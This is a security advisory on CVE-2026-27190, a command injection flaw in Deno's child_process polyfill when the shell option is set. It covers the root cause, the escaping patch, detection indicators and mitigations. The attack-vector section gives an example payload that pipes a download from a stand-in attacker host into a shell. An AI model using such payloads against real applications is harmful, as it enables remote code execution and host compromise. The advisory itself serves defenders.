CVE-2026-27190 Overview
CVE-2026-27190 is a command injection vulnerability in Deno's node:child_process implementation. Deno is a JavaScript, TypeScript, and WebAssembly runtime that provides Node.js compatibility through polyfills. The flaw exists in the shell argument handling logic prior to version 2.6.8. Attackers can inject shell metacharacters through unescaped arguments passed to child process APIs when the shell option is enabled. The vulnerability is tracked under CWE-78 (OS Command Injection) and was fixed in Deno 2.6.8.
Critical Impact
Remote attackers can execute arbitrary operating system commands through unsanitized arguments passed to Deno's child_process shell execution path, leading to full host compromise.
Affected Products
- Deno runtime versions prior to 2.6.8
- Applications using node:child_process polyfill with the shell option enabled
- Server-side JavaScript and TypeScript workloads running on vulnerable Deno releases
Discovery Timeline
- 2026-02-20 - CVE-2026-27190 published to the National Vulnerability Database (NVD)
- 2026-03-02 - Last updated in NVD database
Technical Details for CVE-2026-27190
Vulnerability Analysis
The vulnerability resides in ext/node/polyfills/internal/child_process.ts, which implements Deno's Node.js-compatible child_process module. When applications invoke child process APIs with the shell: true option and pass an array of arguments, Deno previously joined the file name and arguments using a plain space delimiter. The joined string was then handed to the shell for interpretation. Arguments containing shell metacharacters such as ;, |, &, $(), or backticks were not escaped before concatenation. An attacker who controls any portion of the argument array can break out of the intended command and inject additional shell commands.
Root Cause
The root cause is missing input sanitization in the shell command construction path. The original implementation trusted argument values when options.shell was set, treating them as benign string fragments. This violates the principle of separating command structure from user data, which is the defining characteristic of CWE-78 command injection flaws.
Attack Vector
Exploitation requires an application that forwards attacker-influenced data into the args array of a child_process API call with shell: true. This pattern is common in web servers, build tools, and automation scripts that wrap system utilities. A malicious payload such as "; curl attacker.tld | sh; #" placed inside an argument string would terminate the intended command and execute follow-on shell instructions under the privileges of the Deno process.
]);
if (options.shell) {
- let command = ArrayPrototypeJoin([file, ...args], " ");
+ // When args are provided, escape them to prevent shell injection.
+ // When no args are provided (just a string command), the user intends
+ // for shell interpretation, so don't escape.
+ let command;
+ if (args.length > 0) {
+ const escapedParts = [escapeShellArg(file), ...args.map(escapeShellArg)];
+ command = ArrayPrototypeJoin(escapedParts, " ");
+ } else {
+ command = file;
+ }
// Transform Node.js flags to Deno equivalents in shell commands that invoke Deno
command = transformDenoShellCommand(command, options.env);
// Set the shell, switches, and commands.
Source: Deno commit 9132ad9. The patch introduces escapeShellArg and applies it to both the file and each argument before joining, preventing metacharacter interpretation.
Detection Methods for CVE-2026-27190
Indicators of Compromise
- Deno processes spawning unexpected shell utilities such as sh, bash, cmd.exe, curl, wget, or nc as child processes
- Outbound network connections originating from deno processes to unfamiliar hosts shortly after handling user input
- Shell history or audit logs showing commands chained via ;, &&, or | initiated by the Deno runtime user
Detection Strategies
- Inventory Deno deployments and identify versions older than 2.6.8 using software composition analysis or runtime checks against Deno.version.deno
- Static code review for calls to child_process.exec, execSync, spawn, or spawnSync with shell: true and user-influenced arguments
- Behavioral monitoring of process trees where deno spawns shell interpreters that subsequently launch network or filesystem tools
Monitoring Recommendations
- Forward process creation events from Deno hosts into a centralized analytics platform and alert on anomalous child process chains
- Track egress traffic from Deno workloads and flag connections to non-allowlisted destinations
- Enable file integrity monitoring on directories writable by the Deno service account to detect post-exploitation artifacts
How to Mitigate CVE-2026-27190
Immediate Actions Required
- Upgrade Deno to version 2.6.8 or later on every host, container image, and CI/CD runner
- Audit application code for child_process calls that combine shell: true with externally supplied arguments and refactor to pass arguments without a shell
- Restrict outbound network access from Deno workloads to reduce the blast radius of successful command injection
Patch Information
The fix is delivered in Deno release v2.6.8 and described in GitHub Security Advisory GHSA-hmh4-3xvx-q5hr. The corresponding source change is available in commit 9132ad9, which adds escapeShellArg for the file name and each argument when the shell option is set.
Workarounds
- Disable the shell option and invoke binaries directly with an argument array, which avoids shell interpretation entirely
- Validate and allowlist argument values against a strict character set before passing them to any child_process API
- Run Deno processes under a dedicated low-privilege account with seccomp or AppArmor profiles that block unexpected child binaries
# Verify the installed Deno version and upgrade if below 2.6.8
deno --version
deno upgrade --version 2.6.8
# Container image example: pin a patched Deno release
# FROM denoland/deno:2.6.8
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
